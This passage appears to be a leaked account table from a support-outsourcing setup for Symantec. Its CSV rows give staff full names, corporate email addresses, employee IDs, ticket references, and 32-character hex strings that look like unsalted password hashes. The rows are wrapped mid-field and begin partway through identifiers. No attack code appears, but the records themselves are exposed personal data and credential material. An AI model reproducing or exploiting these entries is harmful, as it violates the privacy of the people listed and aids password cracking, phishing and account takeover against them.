k>,230608,Vanessa,NULL,NULL,NULL
324-45c2-8c57-6aca53687da0,<blank>,<blank>,Mariliese_Cabilbil@SUTH.COM,Sutherlan
d,3540b901e0816ad6dae9137a9076ea41,Cabilbil,<blank>,Mariliese_Cabilbil,Mariliese
,NULL,NULL,NULL
2e0-4dac-82f5-6a6248b2d3d1,<blank>,<blank>,Marina_John@SUTH.COM,Sutherland,d22ad
9c9ec4456cd0d916e7b5038da8d,John,<blank>,Marina_John,Marina,NULL,NULL,NULL
d57-4f83-9f2a-510e5f324414,<blank>,<blank>,MarkAnthony_DeVera@SUTH.COM,Sutherlan
d,5918a1ba1d8ab8eeb16428523ff5464a,DeVera,<blank>,MarkAnthony_DeVera,MarkAnthony
,NULL,NULL,NULL
c67-4c41-a96f-51d6b2d97d6a,<blank>,<blank>,MarkAnthonyLodrico_Noble@SUTH.COM,Sut
herland,83bad3b38e51e8cdbaf4d6db76d819a0,LodricoNoble,<blank>,MarkAnthonyLodrico
_Noble,MarkAnthony,NULL,NULL,NULL
845-40e8-8c83-89c4f6841d0d,<blank>,<blank>,MarkF_Whidden@SUTH.COM,Sutherland,fda
7d3dc8928a24236d395929ecaa5f1,F Whidden,<blank>,MarkF_Whidden,Mark,NULL,NULL,NUL
L
6b23-4071-853c-17d1e3e9e343,sms 01.10,EMPROV,Tools_Id@Symantec.Suth.com,Sutherla
nd,8701fd5ecae3bc92e10910a03c42bc7b,BVGL,<blank>,089990,Kumar,NULL,NULL,NULL
893-4297-841d-f8081c67f1af,<blank>,<blank>,MarkKristoffer_Bognot@SUTH.COM,Suther
land,622565623ee7733881371cf4d33c0078,KristofferBognot,<blank>,MarkKristoffer_Bo
gnot,Mark,NULL,NULL,NULL
5c9-4f1a-bd28-65360a182cce,<blank>,87465/2633288,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",f6578cdfbd3676d9d2e06db027e0b45f,Hashmi,<blank>,f
araz_hashmi,Faraz,NULL,NULL,NULL
3206-4030-b831-ebaa9d610285,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607039 - PR - 27th March 2012,a9a582049d40ff5477ac798422ca4f49,Iyer,<blank>,2231
22,C K Ganesh ,NULL,NULL,NULL
26e-4087-ac20-20549ab565a8,<blank>,<blank>,LouErickson_Aguinaldo@Suth.com,Suther
land,bdcb2bd4717e5f7171fcb0d61251b939,EricksonAguinaldo,<blank>,LouErickson_Agui
naldo,Lou,NULL,NULL,NULL
485-4235-a9d2-26a0992bf598,<blank>,2614953,Lovely_Templa@SUTH.COM,Sutherland,03b
c1fe2e4b72f6f8ab724e06ced6b28,AdormedTempla,<blank>,Lovely_Templa,Lovely,NULL,NU
LL,NULL
d34-4a44-a222-0ff7ed97b0f6,<blank>,<blank>,Lynn_Boyd@SUTH.COM,Sutherland,7d595aa
250fd09df00a5969017048655,Boyd,<blank>,Lynn_Boyd,Lynn,NULL,NULL,NULL
388-4d79-b803-9ddf8295e1e8,<blank>,<blank>,Ma.Cristina_Sotto@SUTH.COM,Sutherland
,61b3b3ac3013ef026fdf021f4668f280,CristinaSotto,<blank>,MaCristina_Sotto,Ma.,NUL
L,NULL,NULL
d26b-412a-adfb-06e8f31ddbb5,CRQ000000349498-CLNP-04/10/2011,000-0000,tools_id@sy
mantec.suth.com,Sutherland,885995b9c5bccd74abf46e1224393f6e,Periyasamy,<blank>,0
75703,Vasantha,NULL,NULL,NULL
9e50-42e2-81e8-2f8c30fd5220,WS 22-07-2010,INC000000222756,Timothy_Coleman@symant
ec.com,<blank>,a0041d4c73d17f92e2fd4dd17571be34,Coleman,<blank>,022692,Timothy,N
ULL,NULL,NULL
828-4b64-8cfa-43baac838e91,<blank>,<blank>,MadhanKumar_S4@SUTH.COM,Sutherland,33
234e4147d68c57ad4a18daed322bf8,S,<blank>,MadhanKumar_S4,Madhan Kumar,NULL,NULL,N
ULL
7f40-4ee6-a60d-343c935cecf9,SRB 12.08.2010,INC000000241142,tools_id@symantec.sut
h.com,sutherland,1df50780dc4107dad9e1a9527ba3b061,KumarSuth,<blank>,098411,Vijay
,NULL,NULL,NULL
9d65-4d92-979d-dd81d173c1ae,nam-08-19-2010,CRQ000000112137,tools_id@symantec.sut
h.com,Sutherland,029731f0d9de9b1890dd7353355cf6d0,D Souza,<blank>,108206,Christo
pher,NULL,NULL,NULL
bea-469f-84e1-eb452f813e69,<blank>,<blank>,Mamata_R@SUTH.COM,Sutherland,f886ac9e
3d5fc17776ee080aaec1c17f,R,<blank>,Mamata_R,Mamata,NULL,NULL,NULL
8155-4a66-987f-2168d6e422e3,<blank>,<blank>,Edrian_Oser1@SPI.COM,PM - 6/14/2012
- CRQ000000694657,808874a0d5b3b24a40ce50a8f4f5a304,Oser,<blank>,226749,Edrian,NU
LL,NULL,NULL
739c-42ed-9bf6-987b290bc3aa,"CRQ000000830082 CLNP Oct 08,2012",000-0000,jenny_za
rate@symantec.com,Symantec,ae4102dad4defb532cb25e98391a9ea1,Zarate,<blank>,23061
7,Jenny,NULL,NULL,NULL
51a-4321-9008-0cc803ef0449,<blank>,2614952,MarichuEstrallada_Saceda@symantec.sut
h.com,Sutherland,83f41ced1a1e09a7eaec8a8210f7c70c,Saceda,<blank>,MarichuEstralla
da_Saceda,Marichu,NULL,NULL,NULL
6308-47e5-8ec4-c9f9e5352b17,"CRQ000000830086 CLNP Oct 08,2012",000-0000,franklin
_hornilla@symantec.com,Symantec,93729c8e529ed2d13bd607f52827dc10,Hornilla,<blank
>,230619,Franklin,NULL,NULL,NULL
a9aa-4530-a60a-7c8683e95ec5,30/12/2009 - SPJ,EMPROV,accounts@symantec.teleperfor
mance.gr,Teleperformance,ef0669c0ea4de9cb24edb65209a56a49,Leger,<blank>,097983,J
ulie,NULL,NULL,NULL
16c-41bd-bc8c-871f9155e1dc,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,b0cf7bfe235017703fbc75846d896fa4,M,<blank>,MaryMarudula_M,Mary Marudula,NULL,NU
LL,NULL
98a-4b8b-815d-73cae5c7dbeb,<blank>,<blank>,Mateen_AhmedAttar@SUTH.COM,Sutherland
,9a46ac24c1d7831f5050244ceacdb0d8,Ahmed Attar,<blank>,Mateen_AhmedAttar,Mateen,N
ULL,NULL,NULL
b9a-4acd-9c8c-d7c94d926e68,WS 16-07-2010,INC213497,Mathew_JP@SUTH.COM,Sutherland
,010a7e32ee620a193c8cfab2c2c42fe7,Mathew,<blank>,Mathew_JP,J,NULL,NULL,NULL
4b54-4543-b583-44c1f2186530,<blank>,emprov,tools_id@symantec.suth.com,sutherland
,bea5b97aeca52896f14c11f4cd2c74da,S,<blank>,094794,Sriram,NULL,NULL,NULL
4e56-4b31-bb74-0fa302096b01,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,188efd41542ad9de1c873170969e7851,RinaTrinidad,<blank>,099675,Michelle,NULL,NULL
,NULL
6ab-4fe5-8f69-6d2c4005b10d,<blank>,<blank>,Maya_Balan@SUTH.COM,Sutherland,b60c4b
f98d90d76f1d12da8b86b9f4a0,Balan,<blank>,Maya_Balan,Maya,NULL,NULL,NULL
65e-4f28-8054-95967200cb65,<blank>,<blank>,MeenakshiPriya_A@SUTH.COM,Sutherland,
abbae6a114f48cef15f8026c055b9a98,A,<blank>,MeenakshiPriya_A,Meenakshi Priya,NULL
,NULL,NULL
7a1-4fb1-bb3f-5fdbdc15d79d,<blank>,<blank>,MeeranStephenRaj_R@SUTH.COM,Sutherlan
d,fe6cc8d20e9b87ff22648311f308e677,R,<blank>,MeeranStephenRaj_R,Meeran Stephen R
aj,NULL,NULL,NULL
23ce-4b05-ac49-55c1b287e609,<blank>,<blank>,sheenagh_oleary@symantec.com,Symante
c,b83c8a0d4d0011de7d49d361458805cc,O'Leary,<blank>,sheenagh_oleary,Sheenagh,NULL
,NULL,NULL
d54-4fb6-9679-aec964af75f8,<blank>,<blank>,LoieCarlo_Paquit@SUTH.COM,Sutherland,
ba15e397d8925a1dc123af7d2188f1a7,RondinaPaquit,<blank>,LoieCarlo_Paquit,LoieCarl
o,NULL,NULL,NULL
360-4382-89a5-142f9ebd21dc,<blank>,<blank>,LovaRajuKandukuri_K@SUTH.COM,Sutherla
nd,7e81d68a24af58df8b3c287b200870d2,K,<blank>,LovaRajuKandukuri_K,Lova Raju Kand
ukuri,NULL,NULL,NULL
7b7-46a8-8e04-b466ffc64517,<blank>,2614952,Tools_id@symantec.suth.com,Symantec,1
5e0caf597fe7f97d83c95a7014b42ae,Pingal,<blank>,abegail_pingal,Abegail,NULL,NULL,
NULL
76b7-4b5d-911e-00cc97752b0d,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,b6e95605a12772eef9aa457d8113639a,Haq,<blank>,074492,Abdul MD,NULL,NULL,NU
LL
73e-4dbd-a303-2815207ad278,<blank>,<blank>,Michael_David@SUTH.COM,Sutherland,f42
609f406f098455ffb149a9ca99d25,David,<blank>,Michael_David,Michael,NULL,NULL,NULL
33b4-4563-83e9-325a2fc11497,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,c7bca3932f45a9a5f361a061d90dff9e,Swaminathan,<blank>,086209,Dhivya,NULL,NULL,NU
LL
b34e-43d2-b111-4f41717990b1,<blank>,INC151150,accounts@symantec.teleperformance.
gr,Teleperformance Greece,758cadd516a8279670de9beb609c599b,Kateros,<blank>,06969
0,Sotirios,NULL,NULL,NULL
422f-461c-8bef-02a1ef1517c3,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,b41c3229c06cc21a064e1659ff7634d3,Manokaran,<blank>,086220,Kothainayaki,NULL,NUL
L,NULL
2c02-47d1-ad06-07fc0d370eb4,<blank>,<blank>,jonathan_mcburney@symantec.com,Syman
tec,67bd67f6489ee50a9558c6cca3a76bf1,McBurney,<blank>,jonathan_mcburney,Jonathan
,NULL,NULL,NULL
f77e-4c7c-bac7-5b9a49ab6c26,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,fc2289490081df892e4e3fed4a42464b,Logaiyan,<blank>,074445,Suresh,NULL,NULL
,NULL
662-4e4c-af87-aa43894ea546,<blank>,<blank>,MikhailAlexisF_Lacson@SUTH.COM,Suther
land,d9c43f897bca5ae037c66aefa7cd86c1,AlexisLacson,<blank>,MikhailAlexisF_Lacson
,Mikhail,NULL,NULL,NULL
7c8-488d-8eaf-2cdf883beb2c,<blank>,<blank>,Mohamed_Iqsal@Suth.Com,Sutherland,e45
39fcb312cf9622883ac82e9873548,M,<blank>,Mohamed_Iqsal,Mohamed Iqsal,NULL,NULL,NU
LL
926-405b-a321-7044957f863a,<blank>,<blank>,MohamedIbrahimAnsari_I@SUTH.COM,Suthe
rland,f3a573c67f1527cfc42e01e0cba67973,I,<blank>,MohamedIbrahimAnsari_I,Mohamed
Ibrahim Ansari,NULL,NULL,NULL
f8b-4a4e-acd7-43dcfdc17e5e,<blank>,2630245,MohammadS_Wahid@SUTH.COM,Sutherland,3
a31bcc84820427f33e312b447562eaa,S Wahid,<blank>,MohammadS_Wahid,Mohammad,NULL,NU
LL,NULL
63d-4aaa-a5ec-c15ea8ea2a1d,<blank>,<blank>,jungeun_choi@symantec.com,Symantec,9a
e94d29db09eb03bdd41573fbed191d,Choi,<blank>,jungeun_choi,Jungeun,NULL,NULL,NULL
28d-4bc8-963f-1caf7650e29b,<blank>,<blank>,Mohammedyassar_PK@SUTH.COM,Sutherland
,fd78ee8857eb39be7e1916bb1cc3d393,P K,<blank>,Mohammedyassar_PK,Mohammed yassar,
NULL,NULL,NULL
26f0-4c5a-a503-fb632f1aaebb,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,<blank>,9b0890c51de1c6b0e155ab37cbf5a411,Kasireddy,<blank>,089788,Indira,NU
LL,NULL,NULL
244-40ac-9259-55d158a0919b,<blank>,<blank>,Mujahid_Sayed@SUTH.COM,Sutherland,b44
ad46e6c8ebba72bed148ba47adf6c,Sayed,<blank>,Mujahid_Sayed,Mujahid,NULL,NULL,NULL
1c3-48bd-a489-4afcdd854f3d,<blank>,<blank>,MuraliDharan_V1@SUTH.COM,Sutherland,2
fad3127c3f49730e35cb0c164b347d8,V,<blank>,MuraliDharan_V1,Murali Dharan,NULL,NUL
L,NULL
16c-4642-b459-af1cc1244973,<blank>,<blank>,NagenderReddy_P@SUTH.COM,Sutherland,7
46646e7b01550634dbfa0aa5d90b11d,P,<blank>,NagenderReddy_P,Nagender Reddy,NULL,NU
LL,NULL
7cdd-431c-a12a-18daad1918ae,CRQ000000460051 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,2e26473c7873aa50ae1c88c03f84bacc,Magoncia,<blank>,1231
94,Jenifer Sison,NULL,NULL,NULL
c4c-4bc0-8e70-5ee778cb1784,<blank>,<blank>,Navendu_Thakur@SUTH.COM,Sutherland,71
1a80c7f1e25210144f9ce1abf552f6,Thakur,<blank>,Navendu_Thakur,Navendu,NULL,NULL,N
ULL
cdd9-45b2-b061-ebe5b54b88b4,nam-08-09-2010,INC000000238017,tools_id@symantec.sut
h.com,Sutherland,9b69a8f0a49c802dafda00013c998c63,Pingal,<blank>,085785,Abegail
Sanchez,NULL,NULL,NULL
bba-4ae5-972d-62a3974b97f1,<blank>,<blank>,Manoj_Pandey@SUTH.COM,Sutherland,5f5e
0c9de575d2cda4295777ff142138,Pandey,<blank>,Manoj_Pandey,Manoj,NULL,NULL,NULL
193-4a31-be14-5d755354f301,<blank>,<blank>,Manoj_Vishwam@SUTH.COM,Sutherland,86f
06fd251dd4419cf783e5626e1e8d7,Vishwam,<blank>,Manoj_Vishwam,Manoj,NULL,NULL,NULL
51a-45b0-b832-876b318181da,<blank>,<blank>,Moses_Paul@Suth.Comypmoses,Sutherland
,2f7759bb40f4a83211c59b94eda84bda,Paul,<blank>,Moses_Paulypmoses,Moses,NULL,NULL
,NULL
3a9-4172-b27c-43d15b8a85f0,<blank>,2632350,Tools_id@symantec.suth.com,Sutherland
,bb4a3739b434ac68b3d833f1206a3669,Sathiyaseelan,<blank>,Moses_S,Thanasingh,NULL,
NULL,NULL
61d-4faa-be0e-dbd7c7cc42d2,<blank>,<blank>,Mubin_Sayyad@SUTH.COM,Sutherland,212c
e6841e086d22f77f9c971f1ff0d7,Sayyad,<blank>,Mubin_Sayyad,Mubin,NULL,NULL,NULL
a433-44a2-9606-ed202704218f,CRQ000000298996--vmd-12/07/2011,000-000,PaulDurai_M@
symantec.com,symantec,6bb3e28c9c84c4efcbb6e9d3e908890f,M,<blank>,117197,PaulDura
i,NULL,NULL,NULL
4641-435c-be94-e91d84bb64fd,sms 29,EMPROV/INC185710,Tools_Id@Symantec.Suth.Com,S
utherland,99d7026f6481965b5d76590d12179f6a,Kuramana,<blank>,099504,Manjula,NULL,
NULL,NULL
e09-43cc-a0be-bcde72a6573b,<blank>,<blank>,MujahidKabeer_K@SUTH.COM,Sutherland,4
6935f213d6d7d0367af2a32930c3f1f,Kamaal Basha,<blank>,MujahidKabeer_K,Mujahid Kab
eer,NULL,NULL,NULL
6631-444e-9b46-792e447f45e3,CRQ000000298996--VMD--12/07/2011,000-000,HarishSharm
a_J@symantec.com,Symantec,f4efb3966213478c33a1e5c6dd5c49d5,J,<blank>,117173,Hari
sh Sharma,NULL,NULL,NULL
362-4ff6-b2ae-c04c02cbb712,<blank>,<blank>,NarasimhaRaj_V@SUTH.COM,Sutherland,85
33a804025707f695a4484259e0edc6,V,<blank>,NarasimhaRaj_V,Narasimha Raj,NULL,NULL,
NULL
d4b-4f6f-8c02-0a2b8f7cc92b,<blank>,<blank>,NarendraKumar_Rayasam@suth.com,Suther
land,8aac6b7c53134599360825dd9db6c5aa,Rayasam,<blank>,NarendraKumar_Rayasam,Nare
ndra Kumar,NULL,NULL,NULL
ac5-4dce-aca8-1c1cf43bacb7,<blank>,<blank>,Naveed_Kazi@SUTH.COM,Sutherland,a07ba
507ba7050df4a4a12ce68340223,Kazi,<blank>,Naveed_Kazi,Naveed,NULL,NULL,NULL
945-4025-91a0-f6903c034568,<blank>,<blank>,Nazima_Fatima@SUTH.COM,Sutherland,c93
994cff4ad18c5a1d10a71b9ee3a25,Fatima,<blank>,Nazima_Fatima,Nazima,NULL,NULL,NULL
51f-4721-b29a-585e8152270f,<blank>,<blank>,Nicon_Perez@SUTH.COM,Sutherland,1e27f
163d5b6a074e12a29e15b59ef52,Perez,<blank>,Nicon_Perez,Nicon,NULL,NULL,NULL
113-4060-aae3-1b4fc2eac5cf,<blank>,<blank>,Nidiya_Saju@SUTH.COM,Sutherland,79dcc
9bd731b7f223a530d1a70fc0240,Saju,<blank>,Nidiya_Saju,Nidiya,NULL,NULL,NULL
cb5-4a52-ac6e-56c3bbb2776b,<blank>,<blank>,Nilesh_K@SUTH.COM,Sutherland,43959bab
c9b54f85da76022e4f6c4bb7,K,<blank>,Nilesh_K,Nilesh,NULL,NULL,NULL
6d0-435a-b502-10d847eede02,<blank>,<blank>,MariaPamela_Espejo@SUTH.COM,Sutherlan
d,73f5c5074ceda85091a78586dcc70c00,PamelaEspejo,<blank>,MariaPamela_Espejo,Maria
,NULL,NULL,NULL
c0b-44c2-a5cf-9867c1535d3f,<blank>,<blank>,MonirulM_Ahsan@SUTH.COM,Sutherland,7b
88442c5ec6e536e809722eb33ba21e,M Ahsan,<blank>,MonirulM_Ahsan,Monirul,NULL,NULL,
NULL
8203-46cd-9f7b-5f50e6523577,<blank>,INC61670,Tools_ID@symantec.Suth.com,Sutherla
nd,1fadab3aac0fd962dabd3159fd863c07,Marie Borthwick,<blank>,091798,Shilpa Sharon
,NULL,NULL,NULL
fdf-4d87-9058-04308dae97c8,<blank>,<blank>,Nirmal_P@SUTH.COM,Sutherland,822a03f8
7923096ec0f0272e45623885,P,<blank>,Nirmal_P,Nirmal,NULL,NULL,NULL
91f-4dae-adf6-d1651e746b5d,<blank>,<blank>,Nirmala_K2@SUTH.COM,Sutherland,1aadf0
d8f4a52470c748d6e13719872b,K,<blank>,Nirmala_K2,Nirmala,NULL,NULL,NULL
eb7e-4b3b-85c8-8f0a97318394,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,b19a818bd9091d16356eb8e9c955d658,RV,<blank>,jiyojith_rv_cc,Jiyojith,NULL,
NULL,NULL
2d7-49d6-956b-de948e193f78,<blank>,<blank>,Nishanthi_EM@SUTH.COM,Sutherland,ab6a
12375a0adcfc9d94c4e6eeafd7d0,E M,<blank>,Nishanthi_EM,Nishanthi,NULL,NULL,NULL
015-43ad-86cc-3db32301ae1f,<blank>,<blank>,Nithya_M2@SUTH.COM,Sutherland,6850be3
a5a65fa842da48ad443c92e45,Muthuswamy,<blank>,Nithya_M2,Nithya,NULL,NULL,NULL
ac7a-4ef7-9612-92334272e058,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,30fd99993405f18525214358090e231f,B,<blank>,mrinalini_b_cc,Mrinalini ,NULL
,NULL,NULL
020-4529-a5ce-ad6d7bd1b0dd,<blank>,<blank>,OharaHannahJoann_Cajes@SUTH.COM,Suthe
rland,61e02a5ab0be1ff254bc1b3e3fdffcd9,JoannCajes,<blank>,OharaHannahJoann_Cajes
,OharaHannah,NULL,NULL,NULL
415-400e-a87d-bc069e0b1e6b,<blank>,<blank>,Orland_DelosSalos@SUTH.COM,Sutherland
,408e99c4a6bcdabe0428a65ce3e13599,Salos,<blank>,Orland_DelosSalos,OrlandDe,NULL,
NULL,NULL
afc-4a1e-8e27-2bcdf5fc3e09,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,Su
therland,a0516a7e97513c6c006f184d7df97529,M,<blank>,Padmanaban_M,Padmanaban,NULL
,NULL,NULL
0b5-4b3c-b22c-16f609ddfd7f,<blank>,<blank>,Patrick_Campbell@suth.com,Sutherland,
ac556a8ddcc581c64f34c407c4612c66,Campbell,<blank>,Patrick_Campbell,Patrick,NULL,
NULL,NULL
4a7-4e8c-a575-118bad3b2083,<blank>,<blank>,PennyL_Morrison@SUTH.COM,Sutherland,c
c077ddb62074ee9adec7f2cf086fd8a,L Morrison,<blank>,PennyL_Morrison,Penny,NULL,NU
LL,NULL
b2f-4d66-a336-9ce1f55655d9,<blank>,<blank>,Perry_Gamboa@SUTH.COM,Sutherland,c4b2
6618e7959fbb7e992cb78f349ed7,Gamboa,<blank>,Perry_Gamboa,Perry,NULL,NULL,NULL
5f4-4214-940b-be08ef5f8d62,<blank>,<blank>,Peter_EJ@SUTH.COM,Sutherland,ec97c26e
7fa0f844557be44c7d746c2d,E J,<blank>,Peter_EJ,Peter,NULL,NULL,NULL
86c-4adc-bfae-4364c8ed4709,<blank>,<blank>,PhaniKumar_PSSSVD@SUTH.COM,Sutherland
,50f48a990af8d120428c8daf4c240062,P S S S V D,<blank>,PhaniKumar_PSSSVD,Phani Ku
mar,NULL,NULL,NULL
e946-4f3a-aaa6-3d3fdbea6015,<blank>,<blank>,nh.symantec@teleperformance.com.ar,<
blank>,fb053df57fcebf4da8d2bb520943f41c,PELIMENE,<blank>,108625,GONZALO,NULL,NUL
L,NULL
f02-4ce8-a674-b554a59302b9,<blank>,<blank>,Pradeep_R2@Suth.Com,Sutherland,b7c12f
4f12bf07b0849097df5f6eb97b,R,<blank>,Pradeep_R2,Pradeep,NULL,NULL,NULL
22a-415b-91bf-b94ece2aa224,<blank>,<blank>,Prakash_S3@SUTH.COM,Sutherland,481a9a
0df4d7ac1108332536f7e44c6a,S,<blank>,Prakash_S3,Prakash,NULL,NULL,NULL
d3e-49d9-aa74-5e0b22d0f1b7,<blank>,<blank>,PraveenKumar_K3@SUTH.COM,Sutherland,0
3c023db3eeddbee44ce5592557fafc2,K,<blank>,PraveenKumar_K3,Praveen Kumar,NULL,NUL
L,NULL
cec-4d41-b310-ee2e3b60915f,<blank>,<blank>,Premaraji_R@SUTH.COM,Sutherland,f9ede
eaa9aaaa3ec5dbd7a447099a0a3,R,<blank>,Premaraji_R,Premaraji,NULL,NULL,NULL
1cf-466d-ace9-2c6c2f5240e6,<blank>,<blank>,PremKumar_S2@SUTH.COM,Sutherland,6563
6b2509eac17e3766f6cdfa5490fb,S,<blank>,PremKumar_S2,Prem Kumar,NULL,NULL,NULL
523-47b2-bca4-4fdfad8a80df,<blank>,<blank>,PremKumar_T@SUTH.COM,Sutherland,a507e
ca845cc045bef95c38a3312d336,T,<blank>,PremKumar_T,Prem Kumar,NULL,NULL,NULL
9a5-4892-b9b4-7112b4c3663a,<blank>,<blank>,Priyadarshini_M@SUTH.COM,Sutherland,8
aaf431a44ec993aad0181840bfa7551,M,<blank>,Priyadarshini_M,Priyadarshini,NULL,NUL
L,NULL
bbd-47ec-ae8b-39415e374b62,<blank>,<blank>,Priyadharsini_R@SUTH.COM,Sutherland,f
024b9bec581d8139ad506fddbf30299,R,<blank>,Priyadharsini_R,Priyadharsini,NULL,NUL
L,NULL
514-47f6-8993-c7c26b806ba0,<blank>,<blank>,Melody_Arancon@SUTH.COM,Sutherland,de
ded94b3f1b48f0c0aefeb2397aab17,Arancon,<blank>,Melody_Arancon,Melody,NULL,NULL,N
ULL
544-4fcf-84ae-284efb8e31f1,<blank>,2630245,Michael_Pinsent@suth.com,Sutherland,e
12502ca714a0a1a073daa6922ef4b51,Pinsent,<blank>,Michael_Pinsent,Michael,NULL,NUL
L,NULL
4f2-43b9-b973-b40636d6ea69,<blank>,<blank>,Minu_Varghese@SUTH.COM,Sutherland,082
4c04d8747d2c51b5799f6eba7cd93,Varghese,<blank>,Minu_Varghese,Minu,NULL,NULL,NULL
037-4685-95ac-68311075326d,<blank>,<blank>,Mohammed_Rauf@SUTH.COM,Sutherland,ede
b4a96105ebab9d369309fc5372a8b,Rauf,<blank>,Mohammed_Rauf,Mohammed,NULL,NULL,NULL
1f7-43a4-83bd-aa7911ec9c13,<blank>,<blank>,MohanaPriya_K@SUTH.COM,Sutherland,e77
04d91a9f0cf1f1aa66c8a563991cf,K,<blank>,MohanaPriya_K,Mohana Priya,NULL,NULL,NUL
L
fd2-4e42-a832-d8946d9ad961,<blank>,<blank>,Mohzin_Jaffer@SUTH.COM,Sutherland,4ba
57047db4d20b1fac04f6bec687b7e,Jaffer,<blank>,Mohzin_Jaffer,Mohzin,NULL,NULL,NULL
c6f-444a-bf9e-699e9e5a369b,<blank>,<blank>,Padam_Thapa@SUTH.COM,Sutherland,3d3f5
12fbf40b15ab5649d11e9c24395,Thapa,<blank>,Padam_Thapa,Padam,NULL,NULL,NULL
ee6-42cb-980d-f0cd76ab8375,<blank>,<blank>,Param_Lathigara@SUTH.COM,Sutherland,8
4d703858a1412a90b73fc726161df61,Lathigara,<blank>,Param_Lathigara,Param,NULL,NUL
L,NULL
dec-4692-8b43-8838dc605549,<blank>,2633284,tools_id@symantec.suth.com,Sutherland
,5b6857e2df1fe5fe229268dc25ab7cb0,Kachhela,<blank>,Pinal_Kachhela,Pinal,NULL,NUL
L,NULL
487-4d32-b669-2d4b7db02bef,<blank>,<blank>,PrasanthKumar_M@SUTH.COM,Sutherland,6
402f6751c11b924af5aa00ec857d623,M,<blank>,PrasanthKumar_M,Prasanth Kumar,NULL,NU
LL,NULL
449-45f6-8de5-453300f9dffc,<blank>,<blank>,Puviyarasun_P@SUTH.COM,Sutherland,e60
7ea1a8b8a7b0a3492016b019db2a9,P,<blank>,Puviyarasun_P,Puviyarasun,NULL,NULL,NULL
041-4784-9f6a-cb7fa8ed3c96,<blank>,<blank>,Raghunathe_P@SUTH.COM,Sutherland,0beb
9066f06673dc613efe269c78f832,Periyasamy,<blank>,Raghunathe_P,Raghunathe,NULL,NUL
L,NULL
e4a-4986-8ae7-0fd1bcddca59,<blank>,2632350,RaghuRaman_S@SUTH.COM,Sutherland,f120
6343557a83a95f0bbd5d39b5f0fe,S,<blank>,RaghuRaman_S,Raghu Raman,NULL,NULL,NULL
922-4d0a-b01c-520b73c57969,<blank>,<blank>,Rahul_Goda@SUTH.COM,Sutherland,474fc3
ac28f0f432c83a5990c0042ab8,Goda,<blank>,Rahul_Goda,Rahul,NULL,NULL,NULL
b71b-4b00-a5fb-d3a9950b1a01,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,s
utherland,637b157448c37495d947702eb9247af0,Sakpal,<blank>,074790,Santosh,NULL,NU
LL,NULL
1af-4912-a0ce-26bb50e243bb,<blank>,<blank>,RahulChandran_R@SUTH.COM,Sutherland,9
1ad40f915937dafcd0a40376ee4eac5,R,<blank>,RahulChandran_R,Rahul,NULL,NULL,NULL
c0f-4a3b-8480-0d17929b5c72,<blank>,<blank>,Rajani_Nair@SUTH.COM,Sutherland,f9e97
649e82958614df2dbe5808eb7a6,Nair,<blank>,Rajani_Nair,Rajani,NULL,NULL,NULL
60ea-4e2e-9a81-d36e9ef1ea10,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,878648819202cad13761c12ed16619a9,S V,<blank>,075959,Vasanth,NULL,NULL
,NULL
78f-48a0-8c38-1cad722c3378,<blank>,<blank>,Rajesh_M1c2524@SUTH.COM,Sutherland,2a
f83752f16185a512cd82267e59c90c,M,<blank>,Rajesh_M1c2524,Rajesh,NULL,NULL,NULL
0de-44fc-a00e-c1860cc0036e,<blank>,<blank>,RajeshBabu_S@SUTH.COM,Sutherland,fc57
1ff5ad68795bb38d0eb9f34bf139,S,<blank>,RajeshBabu_S,Rajesh Babu,NULL,NULL,NULL
649-4653-bce9-dc8ae5584a43,<blank>,<blank>,RajeshRamakrishnan_Kurup@SUTH.COM,Sut
herland,fca0cd22b954dfe626a5c3f9598f08a2,Kurup,<blank>,RajeshRamakrishnan_Kurup,
Rajesh,NULL,NULL,NULL
5d3-4be0-a95c-6bfecddece23,<blank>,<blank>,tools_id@symantec.suth.com,Sutherland
,cb4c8b2ecd799abcdc2c171a79e1d6e5,Menon,<blank>,Rajiv_Sadasivan,Rajiv,NULL,NULL,
NULL
9d0-4506-aafe-c04be4bf22a2,<blank>,<blank>,Ramesh_P3@SUTH.COM,Sutherland,872b28f
c0f6dd62fb152097f25991804,Pulla,<blank>,Ramesh_P3,Ramesh,NULL,NULL,NULL
9cf-4766-869e-61e0d8478a06,<blank>,<blank>,Ramesh_P5@SUTH.COM,Sutherland,e333b8b
15d90918791cf806e00e34934,P,<blank>,Ramesh_P5,Ramesh,NULL,NULL,NULL
eb8-49c1-8d89-5ea21d3db822,<blank>,<blank>,Rammohan_KP@SUTH.COM,Sutherland,e1951
43c7513828069aa696b8afbc962,K P,<blank>,Rammohan_KP,Rammohan,NULL,NULL,NULL
5f9-47df-9e3c-e683625b43ec,<blank>,<blank>,Ranil_Misoles@SUTH.COM,Sutherland,3d2
7253c6de775bfe3b920b87305595e,Dag-umMisoles,<blank>,Ranil_Misoles,Ranil,NULL,NUL
L,NULL
dae-4a28-b60f-1ce0575d6daf,<blank>,<blank>,Ranjit_Gill@SUTH.COM,Sutherland,7f2a6
b604d2ea2b874eecadf5e836a64,Gill,<blank>,Ranjit_Gill,Ranjit,NULL,NULL,NULL
ed4d-48b4-9f49-3b4f7e5d61ba,<blank>,EMPROV,Steve_Menachemson@symantec.com,Symant
ec,ea5bcc29f46edfe068ea82808d0d69ba,Woodruff,<blank>,091328,Timothy,NULL,NULL,NU
LL
da9-4981-b2dd-c2aef1516090,<blank>,<blank>,Paresh_Fernandes@SUTH.COM,Sutherland,
368c1757a2ab21c1190473c6bfd27e01,Fernandes,<blank>,Paresh_Fernandes,Paresh,NULL,
NULL,NULL
79c-4176-9575-1e74eba18315,<blank>,<blank>,Parimala_S@SUTH.COM,Sutherland,6be8d8
ba7d307f16606e32eb5cbf21c7,S,<blank>,Parimala_S,Parimala,NULL,NULL,NULL
